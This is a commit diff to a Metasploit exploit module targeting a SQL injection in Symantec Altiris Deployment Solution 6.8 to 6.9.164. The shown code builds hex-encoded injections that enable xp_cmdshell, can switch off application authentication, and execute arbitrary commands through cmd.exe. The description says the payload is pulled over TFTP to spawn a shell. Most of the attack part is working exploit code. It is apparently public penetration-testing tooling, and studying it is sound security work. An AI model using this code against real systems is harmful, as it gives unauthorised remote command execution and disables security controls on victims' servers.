Use instance variables for 1-time injections

jvazquez-r7 · jvazquez-r7 · commit fddb69edb3ba · 2013-11-08T08:30:35.000-06:00
diff --git a/modules/exploits/windows/misc/altiris_ds_sqli.rb b/modules/exploits/windows/misc/altiris_ds_sqli.rb
@@ -14,14 +14,15 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Symantec Altiris DS SQLi 6.8 - 6.9.164',
+      'Name'           => 'Symantec Altiris DS SQL Injection',
       'Description'    => %q{
-        This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution. The
-        vulnerability exists on axengine.exe which fails to adequately sanitize numeric input
-        fields in "UpdateComputer" notification Requests. In order to spawn a shell, several SQL
-        injections are required in close succession, first to enable xp_cmdshell, then retrieve
-        the payload via TFTP and finally execute it. The module also has the capability to disable
-        or enable local application authentication.
+        This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution 6.8
+        to 6.9.164. The vulnerability exists on axengine.exe which fails to adequately sanitize
+        numeric input fields in "UpdateComputer" notification Requests. In order to spawn a shell,
+        several SQL injections are required in close succession, first to enable xp_cmdshell, then
+        retrieve the payload via TFTP and finally execute it. The module also has the capability
+        to disable or enable local application authentication. In order to work the target system
+        must have a tftp client available.
       },
       'Author'         =>
         [
@@ -67,16 +68,24 @@ def initialize(info = {})
   def execute_command(cmd, opts = {})
     inject=[]
 
-    if @xp_shell_enable == true
+    if @xp_shell_enable
       inject+=[
         "#{Rex::Text.to_hex("sp_configure \"show advanced options\", 1; reconfigure",'')}",
         "#{Rex::Text.to_hex("sp_configure \"xp_cmdshell\", 1; reconfigure",'')}",
       ]
       @xp_shell_enable = false
     end
 
-    inject+=["#{Rex::Text.to_hex("wc_upd_disable_security",'')}"] if datastore['DISABLE_SECURITY'] == true
-    inject+=["#{Rex::Text.to_hex("wc_upd_enable_security",'')}"] if datastore['ENABLE_SECURITY'] == true
+    if @wc_disable_security
+      inject+=["#{Rex::Text.to_hex("wc_upd_disable_security",'')}"]
+      @wc_disable_security = false
+    end
+
+    if @wc_enable_security
+      inject+=["#{Rex::Text.to_hex("wc_upd_enable_security",'')}"]
+      @wc_enable_security = false
+    end
+
     inject+=["#{Rex::Text.to_hex("master.dbo.xp_cmdshell \'cd %TEMP% && cmd.exe /c #{cmd}\'",'')}"] if cmd != nil
 
     inject.each do |sqli|
@@ -145,7 +154,10 @@ def check
   end
 
   def exploit
+    @wc_disable_security = datastore['DISABLE_SECURITY']
+    @wc_enable_security = datastore['ENABLE_SECURITY']
     @xp_shell_enable = datastore['XP_CMDSHELL']
+
     # CmdStagerVBS was tested here as well, however delivery took roughly
     # 30 minutes and required sending almost 350 notification messages.
     # size constraint requirement for SQLi is: linemax => 393
